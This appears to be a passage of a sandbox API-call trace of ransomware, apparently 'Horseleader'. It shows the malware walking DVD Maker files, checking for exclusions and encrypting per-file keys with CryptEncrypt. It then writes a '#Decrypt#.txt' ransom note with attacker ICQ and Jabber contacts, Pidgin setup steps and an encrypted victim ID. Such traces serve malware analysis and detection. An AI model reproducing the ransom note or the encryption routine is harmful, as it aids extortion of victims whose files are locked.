returned 0xffffffff [0251.465] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72aba1e5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72aba1e5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b5ea6a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x239b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="mainimage-mask.png", cAlternateFileName="")) returned 1 [0251.465] lstrcmpiW (lpString1="mainimage-mask.png", lpString2="Windows") returned -1 [0251.465] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png") returned 75 [0251.465] StrStrIW (lpFirst="mainimage-mask.png", lpSrch=".horseleader") returned 0x0 [0251.465] lstrcmpW (lpString1="mainimage-mask.png", lpString2="#Decrypt#.txt") returned 1 [0251.465] lstrcmpW (lpString1="mainimage-mask.png", lpString2="_uninstalling_.png") returned 1 [0251.465] lstrlenW (lpString=".testttjffg") returned 11 [0251.465] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png", lpSrch=".testttjffg") returned 0x0 [0251.465] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.465] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.465] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\mainimage-mask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.465] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72ae0342, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72ae0342, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b5ea6a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x559, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="notes-static.png", cAlternateFileName="")) returned 1 [0251.465] lstrcmpiW (lpString1="notes-static.png", lpString2="Windows") returned -1 [0251.465] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png") returned 73 [0251.465] StrStrIW (lpFirst="notes-static.png", lpSrch=".horseleader") returned 0x0 [0251.465] lstrcmpW (lpString1="notes-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.466] lstrcmpW (lpString1="notes-static.png", lpString2="_uninstalling_.png") returned 1 [0251.466] lstrlenW (lpString=".testttjffg") returned 11 [0251.466] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png", lpSrch=".testttjffg") returned 0x0 [0251.466] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.466] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.466] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\notes-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.467] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72ae0342, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72ae0342, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b5ea6a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x505, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="play-static.png", cAlternateFileName="")) returned 1 [0251.467] lstrcmpiW (lpString1="play-static.png", lpString2="Windows") returned -1 [0251.467] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png") returned 72 [0251.467] StrStrIW (lpFirst="play-static.png", lpSrch=".horseleader") returned 0x0 [0251.467] lstrcmpW (lpString1="play-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.467] lstrcmpW (lpString1="play-static.png", lpString2="_uninstalling_.png") returned 1 [0251.467] lstrlenW (lpString=".testttjffg") returned 11 [0251.467] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png", lpSrch=".testttjffg") returned 0x0 [0251.467] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.468] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.468] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\play-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.468] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72ae0342, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72ae0342, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b5ea6a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x505, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="play-static.png", cAlternateFileName="")) returned 0 [0251.468] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.469] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\#Decrypt#.txt") returned 70 [0251.469] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.471] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.471] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.472] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.472] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.472] CloseHandle (hObject=0x158) returned 1 [0251.472] GetProcessHeap () returned 0x780000 [0251.473] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.473] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ecb0968, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ecb0968, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b5ea6a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1276, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="BlackRectangle.bmp", cAlternateFileName="")) returned 1 [0251.473] lstrcmpiW (lpString1="BlackRectangle.bmp", lpString2="Windows") returned -1 [0251.473] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp") returned 66 [0251.473] StrStrIW (lpFirst="BlackRectangle.bmp", lpSrch=".horseleader") returned 0x0 [0251.473] lstrcmpW (lpString1="BlackRectangle.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.473] lstrcmpW (lpString1="BlackRectangle.bmp", lpString2="_uninstalling_.png") returned 1 [0251.473] lstrlenW (lpString=".testttjffg") returned 11 [0251.473] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp", lpSrch=".testttjffg") returned 0x0 [0251.473] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.473] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.474] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BlackRectangle.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\blackrectangle.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.475] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ebf2297, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ebf2297, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c9679c1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6a91, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="circleround_glass.png", cAlternateFileName="")) returned 1 [0251.475] lstrcmpiW (lpString1="circleround_glass.png", lpString2="Windows") returned -1 [0251.475] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png") returned 69 [0251.475] StrStrIW (lpFirst="circleround_glass.png", lpSrch=".horseleader") returned 0x0 [0251.475] lstrcmpW (lpString1="circleround_glass.png", lpString2="#Decrypt#.txt") returned 1 [0251.475] lstrcmpW (lpString1="circleround_glass.png", lpString2="_uninstalling_.png") returned 1 [0251.475] lstrlenW (lpString=".testttjffg") returned 11 [0251.475] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png", lpSrch=".testttjffg") returned 0x0 [0251.475] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.475] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.475] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_glass.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.476] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ebf2297, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ebf2297, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c9679c1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xf26, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="circleround_selectionsubpicture.png", cAlternateFileName="")) returned 1 [0251.476] lstrcmpiW (lpString1="circleround_selectionsubpicture.png", lpString2="Windows") returned -1 [0251.476] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png") returned 83 [0251.476] StrStrIW (lpFirst="circleround_selectionsubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.476] lstrcmpW (lpString1="circleround_selectionsubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.476] lstrcmpW (lpString1="circleround_selectionsubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.476] lstrlenW (lpString=".testttjffg") returned 11 [0251.476] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.476] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.476] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.476] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.477] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ebcc13a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ebcc13a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c9679c1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13c3, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="circleround_videoinset.png", cAlternateFileName="")) returned 1 [0251.477] lstrcmpiW (lpString1="circleround_videoinset.png", lpString2="Windows") returned -1 [0251.477] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png") returned 74 [0251.477] StrStrIW (lpFirst="circleround_videoinset.png", lpSrch=".horseleader") returned 0x0 [0251.478] lstrcmpW (lpString1="circleround_videoinset.png", lpString2="#Decrypt#.txt") returned 1 [0251.478] lstrcmpW (lpString1="circleround_videoinset.png", lpString2="_uninstalling_.png") returned 1 [0251.478] lstrlenW (lpString=".testttjffg") returned 11 [0251.478] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png", lpSrch=".testttjffg") returned 0x0 [0251.478] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.478] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.478] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.478] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6edbb2f3, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6edbb2f3, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c53d379, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6a91, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Circle_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.478] lstrcmpiW (lpString1="Circle_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.478] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png") returned 72 [0251.478] StrStrIW (lpFirst="Circle_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.478] lstrcmpW (lpString1="Circle_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.479] lstrcmpW (lpString1="Circle_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.479] lstrlenW (lpString=".testttjffg") returned 11 [0251.479] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.479] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.479] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.479] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.479] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e990cc7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e990cc7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c7063e1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="circle_glass_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0251.479] lstrcmpiW (lpString1="circle_glass_Thumbnail.bmp", lpString2="Windows") returned -1 [0251.479] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp") returned 74 [0251.479] StrStrIW (lpFirst="circle_glass_Thumbnail.bmp", lpSrch=".horseleader") returned 0x0 [0251.479] lstrcmpW (lpString1="circle_glass_Thumbnail.bmp", lpString2="#Decrypt#.txt") returned 1 [0251.480] lstrcmpW (lpString1="circle_glass_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0251.480] lstrlenW (lpString=".testttjffg") returned 11 [0251.480] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp", lpSrch=".testttjffg") returned 0x0 [0251.480] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.480] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.480] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circle_glass_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_glass_thumbnail.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.480] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ede1450, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ede1450, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c7063e1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xf26, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Circle_SelectionSubpictureA.png", cAlternateFileName="")) returned 1 [0251.480] lstrcmpiW (lpString1="Circle_SelectionSubpictureA.png", lpString2="Windows") returned -1 [0251.480] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png") returned 79 [0251.480] StrStrIW (lpFirst="Circle_SelectionSubpictureA.png", lpSrch=".horseleader") returned 0x0 [0251.481] lstrcmpW (lpString1="Circle_SelectionSubpictureA.png", lpString2="#Decrypt#.txt") returned 1 [0251.481] lstrcmpW (lpString1="Circle_SelectionSubpictureA.png", lpString2="_uninstalling_.png") returned 1 [0251.481] lstrlenW (lpString=".testttjffg") returned 11 [0251.481] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png", lpSrch=".testttjffg") returned 0x0 [0251.481] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.481] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.481] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_selectionsubpicturea.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.481] FindNextFileW (in: hFindFile=0x7c6860, 